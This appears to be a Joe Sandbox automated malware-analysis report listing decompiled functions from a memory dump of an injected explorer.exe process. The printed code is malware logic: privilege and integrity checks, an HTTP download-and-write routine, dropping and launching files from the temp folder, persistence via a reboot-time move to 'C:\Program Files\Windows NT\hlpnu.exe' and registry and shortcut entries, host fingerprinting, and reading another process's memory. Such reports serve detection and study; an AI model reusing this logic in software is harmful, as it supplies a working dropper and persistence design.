0x00774a79
0x00774a8b
0x00774a91
0x00774a93
0x00774aa0
0x00774aa0
0x00774aae
0x00774ab9
0x00774abf
0x00774ac8
0x00774ad7
0x00774ae1
0x00774aec
0x00774afc
0x00774b08
0x00774b12
0x00774b22
0x00774b2f
0x00774b47
0x00774b4c
0x00774b4f
0x00774b4f
0x00774b54
0x00774b56
0x00774b31
0x00774b31
0x00774b38
0x00774b3a
0x00774b3a
0x00774b62
0x00774b64
0x00774b6d
0x00774b6d
0x00774b7b
0x00774b99

APIs

GetComputerNameA.KERNEL32(?,00000081), ref: 00774A8B
RegOpenKeyExA.ADVAPI32(80000002,00772174,00000000,00020119,?), ref: 00774AB9

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

Part of subcall function 007744F0: GetVersionExA.KERNEL32(0000009C), ref: 0077451A

GetCurrentProcess.KERNEL32 ref: 00774B17

Part of subcall function 007742D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007742EC
Part of subcall function 007742D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0077430E
Part of subcall function 007742D4: GetLastError.KERNEL32 ref: 00774322
Part of subcall function 007742D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00774358
Part of subcall function 007742D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0077436E
Part of subcall function 007742D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00774393
Part of subcall function 007742D4: CloseHandle.KERNEL32(?), ref: 007743F3

GetCurrentProcess.KERNEL32 ref: 00774B41

Part of subcall function 007741CC: GetCurrentThread.KERNEL32 ref: 007741DE
Part of subcall function 007741CC: OpenThreadToken.ADVAPI32(00000000), ref: 007741E5
Part of subcall function 007741CC: GetLastError.KERNEL32 ref: 007741F4
Part of subcall function 007741CC: GetCurrentProcess.KERNEL32 ref: 00774207
Part of subcall function 007741CC: OpenProcessToken.ADVAPI32(00000000), ref: 0077420E
Part of subcall function 007741CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00774241
Part of subcall function 007741CC: CloseHandle.KERNEL32(?), ref: 0077424E
Part of subcall function 007741CC: AllocateAndInitializeSid.ADVAPI32(0077A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00774278
Part of subcall function 007741CC: EqualSid.ADVAPI32(?,?), ref: 007742A2
Part of subcall function 007741CC: FreeSid.ADVAPI32(?), ref: 007742BE

Strings

t!w, xrefs: 00774AAE

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007782F4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82
processsleep

C-Code - Quality: 100%

			E007782F4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v541;
				char _v1054;
				struct _STARTUPINFOA _v1124;
				struct _PROCESS_INFORMATION _v1140;
				intOrPtr* _t36;
				intOrPtr _t42;
				intOrPtr _t58;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr _t78;

				_t36 = __eax -  *__eax;
				 *_t36 =  *_t36 + _t36;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = _t36;
				_v20 = 0;
				_v24 = E00777CFC(_v12);
				E00771258( &_v1124, 0x44);
				_v1124.cb = 0x44;
				if(_v24 == 0) {
					_t42 =  *0x77a168; // 0x771dec
					E00777290(_t42);
				} else {
					_v28 = E00771110(_v8, 0x778494);
					_t102 = _v28;
					if(_v28 != 0) {
						GetTempPathA(0x201,  &_v1054);
						E00777560( &_v1054, 0x778494, _t102);
						E00771308( &_v541, 0x77849c);
						E0077133C( &_v541,  &_v1054);
						E0077133C( &_v541, 0x77849c);
						_t58 =  *0x77a0a8; // 0x771c4c
						E0077133C( &_v541, _t58);
						if( *((char*)(_v28 + 4)) != 0x31) {
							 *0x77b514 = 0;
							_t63 =  *0x77b510; // 0x790000
							E00771828(_t63);
							E007713B4(0x77b510, _v16);
							_t67 =  *0x77b510; // 0x790000
							E007712B8(_t67, _v16, _v12);
							 *0x77b514 = _v16;
							 *0x77be1c = 0;
							wsprintfA("1530474054", 0x7784a0, _v24);
						} else {
							E0077485C( &_v1054, _v16, _v12);
							Sleep(0x5dc);
							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
								_t78 =  *0x77a174; // 0x771e10
								E00777290(_t78);
							} else {
								_v20 = 0xffffffff;
							}
						}
					}
				}
				return _v20;
			}

0x007782f4
0x007782f6
0x00778301
0x00778304
0x00778307
0x0077830c
0x00778317
0x00778325
0x0077832a
0x00778338
0x00778481
0x00778486
0x0077833e
0x0077834b
0x0077834e
0x00778352
0x00778364
0x00778370
0x00778380
0x00778393
0x007783a7
0x007783af
0x007783bc
0x007783cb
0x0077842d
0x00778432
0x00778437
0x00778444
0x0077844f
0x00778454
0x0077845c
0x00778461
0x00778476
0x007783cd
0x007783d9
0x007783e3
0x00778414
0x0077841f
0x00778424
0x00778416
0x00778416
0x00778416
0x00778414
0x007783cb
0x00778352
0x00778491

APIs

Part of subcall function 00777290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 007772AC
Part of subcall function 00777290: CloseHandle.KERNEL32(?), ref: 007772B9

Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A

Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD

GetTempPathA.KERNEL32(00000201,?), ref: 00778364
wsprintfA.USER32 ref: 00778476

Part of subcall function 0077485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00774886
Part of subcall function 0077485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007748A7
Part of subcall function 0077485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007748C4
Part of subcall function 0077485C: CloseHandle.KERNEL32(000000FF), ref: 007748CE

Sleep.KERNEL32(000005DC), ref: 007783E3
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0077840C

Strings

D, xrefs: 0077832A
>UD , xrefs: 0077833E

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00779230, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
sleep

C-Code - Quality: 78%

			E00779230(intOrPtr* __ebx, intOrPtr* __ecx) {
				void* _t11;
				int _t12;
				CHAR* _t14;
				void* _t22;
				intOrPtr _t24;
				void* _t25;

				if( *__ecx() != 0) {
					_push(0);
					 *__ebx();
				}
				_pop(_t22);
				_pop(_t19);
				_t24 =  *0x77a0a8; // 0x771c4c
				_t11 = E00771110( *((intOrPtr*)(_t25 - 4)), _t24);
				_t29 = _t11;
				if(_t11 == 0) {
					 *((char*)(_t25 - 0x116)) = 0x2d;
				} else {
					 *((char*)(_t25 - 0x116)) = 0x2b;
					Sleep(0x3a98);
				}
				_t12 = E00776E04(_t22, _t29);
				if(_t12 == 0) {
					if( *((char*)(_t25 - 0x116)) != 0x2d) {
						L9:
						_push(_t12);
						_push(_t22);
						_t12 = E007769BC(_t24, _t32) + E007792CD;
						goto __eax;
					}
					_t14 =  *0x77a0d8; // 0x771cc8
					_t12 = OpenMutexA(0x100000, 0, _t14);
					 *(_t25 - 8) = _t12;
					_t32 =  *(_t25 - 8);
					if( *(_t25 - 8) == 0) {
						goto L9;
					}
					_t12 = CloseHandle( *(_t25 - 8));
					ExitProcess(0);
				}
				return _t12;
			}

0x00779235
0x00779237
0x00779239
0x0077923b
0x0077923f
0x00779240
0x00779242
0x0077924b
0x00779250
0x00779252
0x00779268
0x00779254
0x00779254
0x00779260
0x00779260
0x0077926f
0x00779276
0x00779283
0x007792b3
0x007792b3
0x007792b5
0x007792bb
0x007792cb
0x007792cb
0x00779285
0x00779292
0x00779298
0x0077929b
0x0077929f
0x00000000
0x00000000
0x007792a5
0x007792ad
0x007792ad
0x00779464

APIs

Sleep.KERNEL32(00003A98), ref: 00779260

Part of subcall function 00776E04: GetModuleFileNameA.KERNEL32(00000000,?,000001F5), ref: 00776E26
Part of subcall function 00776E04: CharUpperBuffA.USER32(?,000001F5), ref: 00776E37

OpenMutexA.KERNEL32(00100000,00000000,00771CC8), ref: 00779292
CloseHandle.KERNEL32(00000000), ref: 007792A5
ExitProcess.KERNEL32 ref: 007792AD

Part of subcall function 007769BC: GetTempPathA.KERNEL32(00000101,?), ref: 007769E1

Strings

-, xrefs: 0077927C

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778258, Relevance: 7.6, APIs: 5, Instructions: 50
network

C-Code - Quality: 28%

			E00778258(char* __eax) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v84;
				char _v484;
				intOrPtr _t31;
				void* _t46;

				_v8 = __eax;
				 *_v8 = 0;
				 *0x77b3c0(0x101,  &_v484);
				gethostname( &_v84, 0x40);
				_t31 =  *0x77b3e0( &_v84);
				_v12 = _t31;
				if(_v12 != 0) {
					_v16 =  *((intOrPtr*)(_v12 + 0xc));
					_v20 = 0;
					while( *((intOrPtr*)(_v16 + _v20 * 4)) != 0) {
						E0077133C(_v8,  *0x77b344( *((intOrPtr*)( *((intOrPtr*)(_v16 + _v20 * 4))))));
						E0077133C(_v8, E007782F4);
						_t46 = _t46 + 0x10;
						_v20 = _v20 + 1;
					}
					return  *0x77b3d8();
				}
				return _t31;
			}

0x00778261
0x00778267
0x00778276
0x00778282
0x0077828c
0x00778292
0x00778299
0x007782a1
0x007782a6
0x007782dd
0x007782c1
0x007782d2
0x007782d7
0x007782da
0x007782da
0x00000000
0x007782e9
0x007782f2

APIs

WSAStartup.WS2_32(00000101,?), ref: 00778276
gethostname.WS2_32(?,00000040), ref: 00778282
gethostbyname.WS2_32(?), ref: 0077828C
inet_ntoa.WS2_32(?), ref: 007782B6
WSACleanup.WS2_32 ref: 007782E9

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00773C28, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184
file

C-Code - Quality: 98%

			E00773C28(intOrPtr __eax, void* __ecx, CHAR* __edx) {
				intOrPtr _v8;
				CHAR* _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _v68;
				signed int _v72;
				char _v201;
				char _v458;
				void _v1483;
				signed int _t88;
				intOrPtr _t93;
				void* _t94;
				intOrPtr _t162;
				intOrPtr _t165;
				void* _t175;
				void* _t180;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				_t176 =  *0x77b7a4;
				if( *0x77b7a4 == 0) {
					E00773A04(_t176);
				}
				_t162 =  *0x77a1a4; // 0x771ec0
				_t88 = E00771110(_v8, _t162);
				asm("sbb eax, eax");
				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
				_v56 = E00771110(_v8, E00773E98);
				if(_v56 != 0) {
					_v56 = _v56 + 2;
					_v60 = E00771110(_v56, 0x773e9c);
					_v32 = _v60 - _v56;
					E007712B8( &_v201, _v32, _v56);
					 *((char*)(_t175 + _v32 - 0xc5)) = 0;
					E00771308( &_v458, _v60);
				}
				_t93 =  *0x77a298; // 0x0
				_t94 = _t93 - 1;
				_t180 = _t94;
				if(_t180 < 0) {
					_v64 = 0;
				} else {
					if(_t180 == 0) {
						_v64 = 0;
					} else {
						if(_t94 == 1) {
							_v64 = 1;
						}
					}
				}
				_v20 = E00773864(0x77b7a4, _v64, 0, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x50;
				} else {
					_v72 = 0x1bb;
				}
				_v24 = E0077161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x4400000;
				} else {
					_v72 = 0x4c03000;
				}
				_t165 =  *0x77a244; // 0x7720b8
				_v28 = E00771660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
				if(_v68 != 0) {
					_v32 = 4;
					E007716D8(_v28,  &_v72, 0x1f,  &_v32);
					_v72 = _v72 | 0x00000100;
					E0077170C(_v28,  &_v72, 0x1f, 4);
				}
				E007715E4(_v28, 0, 0, 0, 0);
				_v32 = 4;
				_v36 = 0;
				_v40 = 0;
				E007739CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
				if(_v36 != 0xc8) {
					L24:
					E0077151C(_v28);
					E0077151C(_v24);
					E0077151C(_v20);
					return _v16;
				} else {
					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_v52 == 0xffffffff) {
						goto L24;
					} else {
						goto L21;
					}
					do {
						L21:
						_v44 = E007716A4(_v28, 0,  &_v32, 0);
						E007715B0(_v28, 0x401,  &_v1483,  &_v32);
						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
					} while (_v32 != 0 || _v44 == 0);
					CloseHandle(_v52);
					_v16 = 0xffffffff;
					goto L24;
				}
			}

0x00773c31
0x00773c34
0x00773c39
0x00773c3c
0x00773c43
0x00773c45
0x00773c45
0x00773c4a
0x00773c53
0x00773c60
0x00773c62
0x00773c72
0x00773c79
0x00773c81
0x00773c91
0x00773c9a
0x00773ca9
0x00773cb1
0x00773cc2
0x00773cc2
0x00773cc7
0x00773ccc
0x00773ccc
0x00773ccf
0x00773cda
0x00773cd1
0x00773cd1
0x00773ce1
0x00773cd3
0x00773cd4
0x00773ce6
0x00773ce6
0x00773cd4
0x00773cd1
0x00773d01
0x00773d08
0x00773d13
0x00773d0a
0x00773d0a
0x00773d0a
0x00773d36
0x00773d3d
0x00773d48
0x00773d3f
0x00773d3f
0x00773d3f
0x00773d61
0x00773d6f
0x00773d76
0x00773d78
0x00773d8e
0x00773d93
0x00773da7
0x00773da7
0x00773db7
0x00773dbc
0x00773dc5
0x00773dca
0x00773de0
0x00773dec
0x00773e78
0x00773e7b
0x00773e83
0x00773e8b
0x00773e96
0x00773df2
0x00773e0e
0x00773e15
0x00000000
0x00000000
0x00000000
0x00000000
0x00773e17
0x00773e17
0x00773e26
0x00773e3b
0x00773e55
0x00773e5b
0x00773e6b
0x00773e71
0x00000000
0x00773e71

APIs

Part of subcall function 00773864: InternetOpenA.WININET(?,?,?,?,?), ref: 0077387C

Part of subcall function 0077161C: InternetConnectA.WININET(?,?,?,?,?,?,?,?), ref: 0077164D

Part of subcall function 00771660: HttpOpenRequestA.WININET(?,?,?,?,?,?,?,?), ref: 0077168F

Part of subcall function 007715E4: HttpSendRequestA.WININET(?,?,?,?,?), ref: 00771607

Part of subcall function 007739CC: HttpQueryInfoA.WININET(?,?,?,?,?), ref: 007739EF

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00773E08

Part of subcall function 007716A4: InternetQueryDataAvailable.WININET(?,?,?,?), ref: 007716C3

Part of subcall function 007715B0: InternetReadFile.WININET(?,?,?,?), ref: 007715CF

WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00773E55
CloseHandle.KERNEL32(000000FF), ref: 00773E6B

Part of subcall function 0077151C: InternetCloseHandle.WININET(?), ref: 00771529

Part of subcall function 007716D8: InternetQueryOptionA.WININET(?,?,?,?), ref: 007716F7

Part of subcall function 0077170C: InternetSetOptionA.WININET(?,?,?,?), ref: 0077172B

Strings

P, xrefs: 00773D13

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007776A0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 146

C-Code - Quality: 93%

			E007776A0(int __eax, void* __ebx) {
				int _v8;
				char* _v12;
				char* _v16;
				char _v273;
				char _v530;
				void* __ebp;
				int _t38;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				void* _t111;
				void* _t112;
				void* _t113;

				_t38 = __eax;
				_v8 = __eax;
				if( *0x77b514 > 0 &&  *0x77b510 != 0) {
					E00771308( &_v530, 0x77b518);
					 *((char*)(_t111 + E007712DC(0x77b518) - 0x212)) = 0;
					E0077133C( &_v530, ".lnk");
					_t113 = _t112 + 8;
					_t96 =  &_v530;
					_t102 =  *0x77a0ac; // 0x771c58
					_t46 = E00773FC8(0x77b518, __ebx,  &_v530, _t102);
					asm("sbb eax, eax");
					if( ~( ~_t46) == 0) {
						E00771308( &_v530, 0x7778ec);
						E0077133C( &_v530, "C:\Program Files\Windows NT\hlpnu.exe");
						E0077133C( &_v530, 0x7778f0);
						_t92 =  *0x77a0ac; // 0x771c58
						E0077133C( &_v530, _t92);
						_t113 = _t113 + 0x18;
					}
					if( *0x77a034 == 0) {
						_t50 = E00774968(0x80000001, _t96,  &_v530);
						asm("sbb eax, eax");
						_t38 =  ~( ~_t50);
						if(_t38 != 0 &&  *0x77b514 > 0 &&  *0x77b510 != 0) {
							_t97 =  *0x77b514; // 0x4e600
							_t104 =  *0x77b510; // 0x790000
							E0077485C(0x77b518, _t97, _t104);
							return E0077763C(0x77b518);
						}
					} else {
						_t57 = E00774968(0x80000002, _t96,  &_v530);
						asm("sbb eax, eax");
						_t38 =  ~( ~_t57);
						if(_t38 != 0) {
							if(_v8 != 0) {
								_t100 =  *0x77b514; // 0x4e600
								_t109 =  *0x77b510; // 0x790000
								E0077485C(0x77b518, _t100, _t109);
								return E0077763C(0x77b518);
							}
							E00771308( &_v273, 0x77b518);
							_v12 =  &_v273;
							_v16 = 0;
							while( *_v12 != 0) {
								if( *_v12 == 0x5c) {
									_v16 = _v12;
								}
								_v12 = _v12 + 1;
							}
							if(_v16 == 0) {
								_v16 =  &_v273;
							} else {
								_v16 = _v16 + 1;
							}
							 *_v16 = 0;
							_v12 = E00773B80(9, 0x19, 0x14);
							E0077133C(_v16, _v12);
							E00771440(_v12);
							E0077133C(_v16, ".txt");
							_t38 = MoveFileExA( &_v273, "C:\Program Files\Windows NT\hlpnu.exe", 4);
							if( *0x77b514 > 0 &&  *0x77b510 != 0) {
								_t99 =  *0x77b514; // 0x4e600
								_t108 =  *0x77b510; // 0x790000
								E0077485C( &_v273, _t99, _t108);
								return E0077763C( &_v273);
							}
						}
					}
				}
				return _t38;
			}

0x007776a0
0x007776a9
0x007776b3
0x007776d1
0x007776e0
0x007776f4
0x007776f9
0x007776fc
0x00777707
0x0077770d
0x00777714
0x0077771a
0x00777727
0x00777738
0x0077774c
0x00777754
0x00777761
0x00777766
0x00777766
0x00777770
0x0077789e
0x007778a5
0x007778a7
0x007778ab
0x007778c4
0x007778ca
0x007778d0
0x00000000
0x007778da
0x00777776
0x00777781
0x00777788
0x0077778a
0x0077778e
0x00777798
0x0077779f
0x007777a5
0x007777ab
0x00000000
0x007777b5
0x007777ca
0x007777d5
0x007777da
0x007777f0
0x007777e5
0x007777ea
0x007777ea
0x007777ed
0x007777ed
0x007777fc
0x00777809
0x007777fe
0x007777fe
0x007777fe
0x0077780f
0x0077781d
0x00777828
0x00777833
0x00777841
0x00777857
0x00777864
0x00777875
0x0077787b
0x00777881
0x00000000
0x0077788c
0x00777864
0x0077778e
0x00777770
0x007778e2

APIs

Part of subcall function 00773FC8: CoInitialize.OLE32(00000000), ref: 00774001
Part of subcall function 00773FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00774089
Part of subcall function 00773FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 007740A7

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

MoveFileExA.KERNEL32(?,C:\Program Files\Windows NT\hlpnu.exe,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00777857

Part of subcall function 00774968: SHGetValueA.SHLWAPI(?,00771DAC,?,00000001,00000000,?), ref: 007749B1
Part of subcall function 00774968: RegOpenKeyExA.ADVAPI32(?,00771DAC,00000000,000F003F,?), ref: 007749D0

Part of subcall function 0077485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00774886
Part of subcall function 0077485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007748A7
Part of subcall function 0077485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007748C4
Part of subcall function 0077485C: CloseHandle.KERNEL32(000000FF), ref: 007748CE

Part of subcall function 0077763C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00777658
Part of subcall function 0077763C: GetFileSize.KERNEL32(000000FF,00000000), ref: 0077766D
Part of subcall function 0077763C: CloseHandle.KERNEL32(000000FF), ref: 0077768A

Strings

C:\Program Files\Windows NT\hlpnu.exe, xrefs: 007776C6, 007776D6, 00777702, 0077772C, 0077779A, 007777B0, 007777BF, 0077784B, 007778BF, 007778D5
.txt, xrefs: 00777838
.lnk, xrefs: 007776E8

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007764BC, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 91

C-Code - Quality: 100%

			E007764BC(char* __eax, char __edx, void* __eflags) {
				char* _v8;
				char _v9;
				struct _OSVERSIONINFOA _v168;
				char _v233;
				intOrPtr _t68;

				_v9 = __edx;
				_v8 = __eax;
				E00771258(_v8, 0x51);
				 *_v8 = _v9;
				E007712B8(_v8 + 0x10, 0x12, 0x77b719);
				E007712B8(_v8 + 1, E007712DC(0x77b794), 0x77b794);
				E00771258( &_v168, 0x9c);
				_v168.dwOSVersionInfoSize = 0x9c;
				GetVersionExA( &_v168);
				E00771864(_v168.dwMajorVersion,  &_v233);
				 *((char*)(_v8 + 0x22)) = _v233;
				 *((char*)(_v8 + 0x23)) = 0x2e;
				E00771864(_v168.dwMinorVersion,  &_v233);
				 *((char*)(_v8 + 0x24)) = _v233;
				_t68 =  *0x77a068; // 0x3
				E00771864(_t68,  &_v233);
				 *((char*)(_v8 + 0x26)) = _v233;
				if( *0x77a058 == 0) {
					 *((char*)(_v8 + 0x27)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x27)) = 0x31;
				}
				if( *0x77a034 == 0) {
					 *((char*)(_v8 + 0x28)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x28)) = 0x31;
				}
				if(E00773EA0() == 0) {
					 *((char*)(_v8 + 0x25)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x25)) = 0x31;
				}
				 *((intOrPtr*)(_v8 + 0x29)) = E00775468();
				return E00771308(_v8 + 0x2d, 0x77b00c);
			}

0x007764c5
0x007764c8
0x007764d3
0x007764de
0x007764f0
0x0077650a
0x0077651a
0x0077651f
0x00776530
0x00776544
0x00776555
0x0077655b
0x0077656d
0x0077657e
0x00776588
0x0077658e
0x0077659f
0x007765a9
0x007765b7
0x007765ab
0x007765ae
0x007765ae
0x007765c2
0x007765d0
0x007765c4
0x007765c7
0x007765c7
0x007765db
0x007765e9
0x007765dd
0x007765e0
0x007765e0
0x007765f5
0x0077660b

APIs

GetVersionExA.KERNEL32(0000009C), ref: 00776530

Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874

Part of subcall function 00773EA0: RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773ECD
Part of subcall function 00773EA0: RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773EF3

Part of subcall function 00775468: GetSystemTime.KERNEL32(?), ref: 00775472

Strings

67D4697B4F7C08C75D, xrefs: 007764E0
AAA, xrefs: 007764F5, 00776501
explorer 10.0.10586.104, xrefs: 007765F8

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007792CD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35

C-Code - Quality: 35%

			E007792CD() {
				void* _t3;
				intOrPtr _t11;
				intOrPtr* _t18;
				intOrPtr* _t21;
				void* _t24;
				void* _t25;

				_t3 =  *_t21();
				_t28 = _t3;
				if(_t3 != 0) {
					 *_t18(0);
				}
				_pop(_t22);
				_pop(_t19);
				GetModuleFileNameA(0, _t25 - 0x117 + 2, 0x103);
				 *0x77a06c = E00777C50(_t25 - 0x117 + 2);
				_t11 =  *0x77a06c; // 0x5b392e46
				wsprintfA("1530474054", E00779468, _t11);
				_push(GetCursorPos(0x77a578));
				E007769BC(_t24, _t28);
				goto __eax;
			}

0x007792cd
0x007792cf
0x007792d2
0x007792d6
0x007792d8
0x007792dc
0x007792dd
0x007792f0
0x00779304
0x00779309
0x00779319
0x0077932d
0x00779330
0x00779345

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 007792F0

Part of subcall function 00777C50: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00777C71
Part of subcall function 00777C50: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00777C93
Part of subcall function 00777C50: ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 00777CB2
Part of subcall function 00777C50: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 00777CC7
Part of subcall function 00777C50: ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 00777CDD
Part of subcall function 00777C50: CloseHandle.KERNEL32(000000FF), ref: 00777CE7

wsprintfA.USER32 ref: 00779319
GetCursorPos.USER32(0077A578), ref: 00779327

Part of subcall function 007769BC: GetTempPathA.KERNEL32(00000101,?), ref: 007769E1

Strings

1530474054, xrefs: 00779314

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774EF0, Relevance: 6.1, APIs: 4, Instructions: 112

C-Code - Quality: 82%

			E00774EF0(void* __eax, void* __eflags) {
				void* _v8;
				void _v12;
				void* _v16;
				void _v20;
				void _v24;
				void* _v28;
				void* _v32;
				long _v36;
				intOrPtr* _v40;
				void* _v52;
				void _v64;
				signed int _t63;
				signed int _t72;
				signed int _t88;
				signed int _t96;

				_v8 = __eax;
				_v24 = 0;
				_v12 = 0;
				_v28 = E007713DC(0x1000);
				_v32 = E00774E94(_v8);
				if(_v32 != 0) {
					_t63 = ReadProcessMemory(_v8, _v32, _v28, 0x1000,  &_v36);
					asm("sbb eax, eax");
					if( ~( ~_t63) != 0) {
						_t72 = ReadProcessMemory(_v8,  *((intOrPtr*)(_v28 + 0x3c)) + _v32, _v28, 0x1000,  &_v36);
						asm("sbb eax, eax");
						if( ~( ~_t72) != 0) {
							_v24 =  *((intOrPtr*)(_v28 + 0x28)) + _v32;
							_v40 = _v28 + 0xc0;
							if( *_v40 != 0 &&  *((intOrPtr*)(_v40 + 4)) != 0) {
								_t88 = ReadProcessMemory(_v8,  *_v40 + _v32,  &_v64, 0x18,  &_v36);
								asm("sbb eax, eax");
								if( ~( ~_t88) != 0) {
									_v16 = _v52;
									if(_v16 != 0) {
										_t96 = ReadProcessMemory(_v8, _v16, _v28, 0x1000,  &_v36);
										asm("sbb eax, eax");
										if( ~( ~_t96) != 0) {
											_v20 =  *_v28;
											if(_v20 != 0) {
												_v24 = _v20;
											}
										}
									}
								}
							}
						}
					}
				}
				E00771440(_v28);
				_v12 = _v24;
				return _v12;
			}

0x00774ef6
0x00774efb
0x00774f00
0x00774f0d
0x00774f18
0x00774f1f
0x00774f3a
0x00774f42
0x00774f48
0x00774f69
0x00774f71
0x00774f77
0x00774f86
0x00774f91
0x00774f9a
0x00774fbc
0x00774fc4
0x00774fca
0x00774fcf
0x00774fd6
0x00774fed
0x00774ff5
0x00774ffb
0x00775002
0x00775009
0x0077500e
0x0077500e
0x00775009
0x00774ffb
0x00774fd6
0x00774fca
0x00774f9a
0x00774f77
0x00774f48
0x00775014
0x0077501c
0x00775025

APIs

Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2

Part of subcall function 00774E94: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00774EAD
